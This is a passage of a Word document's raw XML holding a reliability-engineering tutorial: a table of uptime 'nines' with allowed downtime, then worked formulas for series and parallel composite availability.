              <w:t>Weekly Downtime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BE5CF9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Means In Practice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="4BEDC59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17C5F6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>90% (1 nine)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124549" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>36.5 days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F8CFF8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~73 hours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4F3DC0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~16.8 hours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00D4BA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Acceptable only for internal batch jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="41F1087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C188B7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99% (2 nines)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A6DF66" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>3.65 days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D51CE6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~7.2 hours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C2A362" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~1.68 hours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02BBF2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Startup / non-critical systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="7B604E4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DF4128" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.9% (3 nines)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D379A4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>8.76 hours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EE67D0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~43.8 minutes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116B3C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~10.1 minutes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4B9A03" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Standard SaaS, most web apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="5B3F448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A8479F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.95%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D07767" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>4.38 hours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817FB0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~21.9 minutes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0C5189" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~5 minutes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A0E35C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Mid-tier production systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="43860CB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348526" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.99% (4 nines)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E4CCAF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>52.6 minutes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8D3328" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~4.4 minutes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F080CA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~1 minute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899782" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Payment systems, core APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="618E410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A20AE5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:lastRenderedPageBreak/>
              <w:t>99.999% (5 nines)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889AD4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>5.26 minutes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A8943A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~26 seconds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4B4D6A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~6 seconds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E594E7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Telecom, financial exchanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="4567B5C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608A2C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.9999% (6 nines)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A18668" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>31.5 seconds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AE4E7A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>~2.6 seconds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055A30" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>&lt;1 second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61C24C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Power grids, air traffic control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36B64B4C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hidden math that most engineers miss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A736393" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Going from 99.9% to 99.99% is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10x harder</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, not incrementally harder. Each additional nine requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFC464" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>More redundant hardware (cost scales non-linearly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DDD677" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>More sophisticated failure detection and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73797E86" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>More rigorous testing and change management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7DF15" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Increasingly complex operational procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35DA9B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Engineering teams whose sole job is reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33104C11" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>99.999% in practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> means your system can have at most </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one ~5-minute outage per year</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. That includes planned maintenance, deployments, infrastructure failures, software bugs, and human errors. Achieving this requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>every single dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> to also be extremely reliable — which leads to the concept of composite availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13430743" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="545BA817">
          <v:rect id="_x0000_i2147" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A5C13" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Composite Availability — How Systems Actually Fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B0A5D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Real systems are composed of multiple components. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>composite availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of a system is determined by how those components are arranged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503953DF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Series Components (All Must Work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425373CB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If your request flows through N components </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all of which must succeed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, the system availability is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>product</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of individual availabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E0E29" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C20572" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_system = A₁ × A₂ × A₃ × ... × A</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857DC5A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A typical web request chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD3EC9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4E99E9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Load Balancer (99.99%) → App Server (99.9%) → Cache (99.9%) → Database (99.9%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247340E9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="748DE622" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_system = 0.9999 × 0.999 × 0.999 × 0.999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2AF1A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 0.9999 × 0.997</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C41898" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 0.9969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF02FC6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = ~99.69%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65A461" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Four components each with 3-nines availability produces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system with less than 3 nines</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Every component added in series </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>degrades</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> overall availability. This is the fundamental tension in microservices architectures — each service hop is another availability multiplier less than 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155FED31" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A system with 10 services each at 99.9%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B1D03" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734B602" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>0.999^10 = 0.99004 ≈ 99%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37543A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Ten 3-nine services chained together gives you a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2-nine system</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A70552" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel Components (Any Can Work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F83E2DF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If you have N </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>redundant</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> copies where the system fails only when </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> copies fail simultaneously, availability improves dramatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A354D0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F97432" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_system = 1 - (1 - A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ᴺ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB8AB1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Two database replicas each at 99.9%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C346AAF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDB93C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_system = 1 - (1 - 0.999)²</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7D771" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 1 - (0.001)²</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440B6B6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 1 - 0.000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE387D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 0.999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B9DB1F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">         = 99.9999%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17E139" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Two 3-nine components in parallel give you </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6 nines</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. This is the mathematical basis for redundancy — the most powerful tool in availability engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27FA96" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three replicas at 99.9%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C50CC9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8828A6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_system = 1 - (0.001)³ = 1 - 0.000000001 = 99.9999999%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C59E5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Critical Assumption: Independence</w:t>
      </w:r>
    </w:p>
